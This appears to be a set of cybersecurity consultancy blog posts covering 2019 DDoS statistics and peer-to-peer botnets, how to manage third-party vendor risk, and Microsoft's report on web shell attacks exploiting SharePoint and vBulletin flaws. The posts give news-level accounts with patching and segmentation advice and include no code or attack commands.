According to Imperva, the top attacked industries in 2019 were games (35.92%), gambling (31.25%), computers and internet (26.51%), business (3.37%) and finance (2.95%); while the top attacked territories were India (22.57%), Taiwan (14.79%), Hong Kong (12.23%), Philippines (11.36%) and United States (8.73%). In 2019, Imperva said application layer attack requests overwhelmingly came from the Philippines and China. The company, however, noted, “Those source origination points were notedly the location of the machines used to carry out the attacks, not necessarily the location of the attackers themselves.”
The Role of Botnets
Imperva’s analysis of the largest application layer DDoS attack which lasted for 13 days and peaked at 292,000 Requests Per Second (RPS) showed that most of the IPs had the same opened ports: 2000 and 7547. The Mirai botnet has been known to target IoT devices exposed to the internet via TCP port 2000 and 7547.
The Mirai botnet was first observed in the wild in 2016. This botnet hijacked IoT devices via factory default usernames and passwords. The release of the Mirai’s source code on September 30, 2016 resulted in the development of new versions of Mirai, with some versions targeting different vendors of IoT devices and some adding new functionalities.
The DDoS attack on the domain name service (DNS) provider Dyn on October 21, 2016 was attributed to the Mirai botnet. The DDoS attack on Dyn resulted in temporarily bringing down America’s top websites such as Twitter, Netflix and Reddit.
In the 4th quarter of 2019, researchers at 360 Netlab reported 2 new botnets: Roboto and Mozi. In November 2019, 360Netlab researchers reported that Roboto attacks Linux servers via CVE-2019-15107, a security vulnerability in the Webmin remote administration application. While Roboto has DDoS capability, the researchers said, there’s no evidence yet that a DDoS attack has been launched by this botnet.
In December 2019, researchers at 360 Netlab reported that Mozi attacks IoT devices, exploiting a handful of security vulnerabilities, including CVE-2014-8361, a security vulnerability in Realtek routers that allows remote attackers to execute arbitrary code, and CVE-2018-10562, a security vulnerability in GPON routers in which the router saves ping results, enabling attackers to execute commands and retrieve their outputs.
While a typical DDoS botnet operates using a command-and-control (C2) server – a computer controlled by an attacker to send malicious commands to infected computers, both Roboto and Mozi rely on peer-to-peer (P2) networks. In P2 networks, decentralized networks of infected computers or “bots” communicate with one another, instead of communicating with a centralized command-and-control server.
The of use P2 networks by cyber criminals isn’t a new thing. For years, attackers have used P2 networks from stealing data to sending malicious commands. P2 networks have been used by attackers to evade the efforts to take down C2 servers. Authorities such as the FBI and technology companies have had success in shutting down botnets that rely on C2 servers to steal data or send malicious commands. By taking down a C2 server, the zombie army or hijacked computers are rendered useless.
Would you like to learn more and see how to protect your organization and mitigate DDoS attacks in under 10-minutes, with no hardware or software to buy or install?
Third-party Risks: A New Frontier and a Major Concern for Businesses
Outsourcing to third parties helps businesses free up time and resources, both of which can be channelled back into core business tasks.
But whether the third party provides accounting, marketing, IT support, HR/Payroll, customer service and support, or any other service, working with them carries an inherent element of risk. After all, these companies have access to sensitive data — contact details for employees and customers, payment information, login details for essential software and tools, and at times to company’s intellectual property.
And a cybersecurity breach could cause this data to fall into the hands of criminals. While most companies are well aware of this danger, too many fail to take action: 77 percent of Canadian small businesses are concerned about being hit by a cyber-attack, but 36 percent choose not to invest in effective security.
That’s a huge oversight. But it’s understandable that small businesses using third-party services for the first time overlook the need for caution when choosing a provider. Third-party risk is something of a new frontier, and technology continues to advance faster than non-experts can keep up with.
This creates a disconnect between businesses and the services they are paying for. As a result, a huge amount of trust is required, and third parties have to be transparent about how they use client data, their security measures, policies and procedures, and more.
In short: due diligence is critical when working with third parties, but what steps can businesses take to mitigate their risk?
Focus on Experienced Vendors and Don’t Cut Corners
Small and medium businesses might be tempted to go with the cheapest third-party service provider in their area. Money can be tight during the early years of building a brand, and usually for some time beyond, too.
But businesses can’t afford to cut corners when choosing vendors responsible for key services and with access to sensitive data.
Always take the time to do your due diligence and find a vendor with provable experience working with companies like your own. They should have a portfolio of satisfied clients they can discuss and be happy to provide references. Even if one of their past clients is in a different industry to your own, a positive experience should give real peace of mind and lend the vendor credibility.
Check for attestations and certifications from leading security brands on the vendor’s website. These are an excellent trust signal, and indicate the team takes its security seriously. Awards from leading publications or organizations reinforce a vendor’s credibility, too.
Make sure to look the vendor up online and search for reviews. And if negative feedback is in short supply, remember that bad reviews may not be genuine. The service provider might be willing to discuss them and share some insight into why they aren’t to be trusted.
Speak to other business-owners and try to find recommendations for reliable third parties in your area. While price is obviously a major factor in your decision, don’t compromise too much just to save a few dollars.
Check their Program for Security Risk Assessments
Take steps to determine the vendor’s approach to security risk assessments, and how regularly they conduct them.
Beware of any team which can’t tell you when they last reviewed their security set-up or what steps they would take if they discovered a data breach. They should be well aware of all potential risks, which measures are necessary to prevent them, and how to communicate these to you in a language you understand.
Reliable vendors will take immediate action to fill any gaps they notice in their cybersecurity posture during assessments. They need to know which cybersecurity attacks their system is particularly vulnerable to, and how a successful attack would disrupt their services.
It’s also vital to find out what a vendor’s plan is for informing clients about a breach, and how they mitigate dangers. This should be documented and well-defined: beware of vendors who seem to be making their plans up on the fly. You want them to be transparent, well-prepared, and in control.
Keep Track of Access
Catalog which tools and files your third-party vendors have access to. You need to know which departments or individuals have permission to use your data, and you can’t always be sure this won’t be misused (by accident or design).
Ask vendors to explain why they require access, and don’t be afraid to get a second opinion if their reasoning doesn’t ring true. A reliable team will be able to explain their requests clearly.
Make sure to check files and tools on a regular basis, to confirm everything is as it should be. Report the first sign of any discrepancies.
Build Your Own Contingency Plans Around Vendors
You need to be prepared for an attack, no matter how good your vendors are, it’s no longer a matter of “if” but a matter of “when”. And this has to go deep, too, so your entire business knows how to proceed if the worst happens.
Think about critical systems which your daily operations depend on. If they were to go down, what processes could your workforce continue to perform? What alternative systems do you have to rely on, if any?
Determining the level of damage, a cyber-attack would make on your company, and identifying ways to mitigate that, is crucial.
Next, consider the incident response readiness and the team. Which employees would be most valuable in this group? How would they be alerted to an incident and how long do you expect it to take for them to go into action?
Another important process to focus on when building your contingency plans is testing. Running experiments can help you assess the quality of your response to attacks, the length of time it would take to communicate with vendors, and how long it might take to get your systems operating again.
Try to make tests a learning process, so you can see where improvements are needed. You might find your vendor is hard to reach in a crisis, or they seem ill-equipped to provide the fast response promised. Either is a major red flag.
Third-party risks can increase businesses’ vulnerabilities to attack, but a cautious, strategic approach to choosing and monitoring vendors can help to keep you safe.
A professional security consulting service will help you understand the risks you face when working with third parties, how to manage them better, and keep your security at its best. ,
Better yet, some cybersecurity firms can help you implement an affordable and automated third-party assessment programme, including initial due diligence and on-going monitoring.
Want to schedule a free consultation and start improving your third-party cybersecurity posture? Just get in touch with our team now!
Microsoft Reports Growing Web Shell Attacks
An average of 77,000 web shell attacks are detected each month on an average of 46,000 distinct computers, this according to the latest report released by Microsoft.
What Is a Web Shell?
Web shell is a malicious code that cybercriminals implant on internet-facing servers to remotely access server functions. This malicious code allows criminals to steal data on the compromised internet-facing server or used this compromised server as a stepping stone for further attacks against their victims.
China Chopper is an example of a web shell. It was first discovered in 2012. After nearly a decade after its discovery, China Chopper remains as the most widely used web shell. Researchers at Cisco Talos Intelligence Group said that as China Chopper is widely available, it’s nearly impossible to attribute this form of attack to a particular group.
Analysis of the China Chopper by researchers at Cisco Talos showed that this web shell allows attackers to retain access to an already compromised web server using a client-side application. This client-side application, the researchers said, contains all the logic needed to control the target, making it handy for threat actors to use. The researchers added that China Chopper only targets systems that run a web server application.
Web Shell Attacks
According to Microsoft, a victim of a web shell attack – an organization in the public sector that Microsoft refused to name – enlisted the services of Microsoft’s Detection and Response Team (DART) to conduct full incident response and remediate the said attack before it could cause further damage.
DART’s investigation showed that the unnamed organization’s attackers implanted a web shell in multiple folders of the organization’s web server. This implanted web shell allowed the attackers to compromise the service accounts and domain admin accounts. DART’s investigation also showed that the initial implanted web shell allowed the attackers to look for additional target systems and install web shells on these additional targeted systems.
Threat groups ZINC, KRYPTON, and GALLIUM are known to have used web shells in their cyber-attacks. According to Microsoft, web shell attackers exploit the security vulnerabilities in web applications or web servers, including the lack of the latest security updates, as well as the lack of antivirus tools, lack of network protection, lack of proper security configuration and lack of informed security monitoring. Attacks typically happen during off-hours or weekends, when attacks are likely not immediately spotted and responded to, Microsoft said.
Security vulnerabilities referred to as CVE-2019-16759 and CVE-2019-0604 are some of those exploited by attackers, Microsoft added. Both CVE-2019-16759 and CVE-2019-0604 had been patched by their respective software vendors.
CVE-2019-16759 is a security vulnerability in vBulletin, a proprietary forum software used by more than 100,000 websites, including websites used by major companies and organizations. CVE-2019-0604, meanwhile, is a security vulnerability in Microsoft SharePoint – a web-based platform that integrates with Microsoft Office. Successful exploitation of CVE-2019-0604 allows an attacker to run malicious code in the context of the SharePoint application pool and the SharePoint server farm account.
On April 23, 2019, the Canadian Centre for Cyber Security issued an alert, warning Canadian organizations of the on-going cyber-attacks that first exploit the security vulnerability of Microsoft SharePoint, in particular, CVE-2019-0604, leading to the deployment of the China Chopper web shell. The following unpatched versions of Microsoft SharePoint are known to be affected: Microsoft SharePoint Server 2019, Microsoft SharePoint Server 2010 SP2, Microsoft SharePoint Foundation 2013 SP1 and Microsoft SharePoint Enterprise Server 2016.
"The China Chopper web shell is extensively used by hostile actors to remotely access compromised web-servers, where it provides file and directory management, along with access to a virtual terminal on the compromised device,” the Canadian Centre for Cyber Security said. “As China Chopper is just 4 Kb in size, and has an easily modifiable payload, detection and mitigation is difficult for network defenders.”
An internal confidential document from the United Nations (U.N.) dated September 20, 2019 and leaked to The New Humanitarianshowed that dozens of servers at the U.N. offices in Geneva and Vienna were illegally accessed starting in July 2019. The internal confidential document from the U.N., seen by the Associated Press, showed that the U.N. attackers were able to access the public organization’s servers by exploiting the security vulnerability of Microsoft’s SharePoint software, in particular, CVE-2019-0604 – a vulnerability that was patched by Microsoft in February and March 2019 but the U.N. failed to update its systems.
Preventive and Mitigating Measures Against Web Shell Attacks
It’s worthy to note that web shells are only deployed on the victims’ internet-facing servers after attackers find an initial loop-hole on the victims’ servers. As shown in the above-mentioned examples, initial entry of the attackers, include unpatched vBulletin (CVE-2019-16759) and unpatched SharePoint (CVE-2019-0604). It’s important, therefore, to patch all your organization’s software in a timely manner as attackers are quick to exploit unpatched software.
In the case of CVE-2019-0604 vulnerability, Microsoft’s March 12, 2019 update should be applied. In the case of CVE-2019-16759, vBulletin’s version 5.5.2/3/4 Patch Level 1 update should be applied. To mitigate vBulletin’s exposure, disable PHP, Static HTML, and Ad Module rendering setting in the administration panel.
It’s also important to practice network segmentation. In network segmentation, your organization’s network is divided into sub-networks. For instance, servers that housed your organization’s critical information and are strictly meant for on-premise use should be part of one sub-network and be kept offline. This way, if attackers manage to infect other sub-networks, this critical sub-network won’t be affected.
You don’t have to face cybercriminals alone. Our experts will help you assess the current state of your cybersecurity posture, and develop a plan to proactively mitigate cyber threats.
Contact us today and protect your most valuable digital assets and your brand’s reputation.
Steve E. Driz, I.S.P., ITCP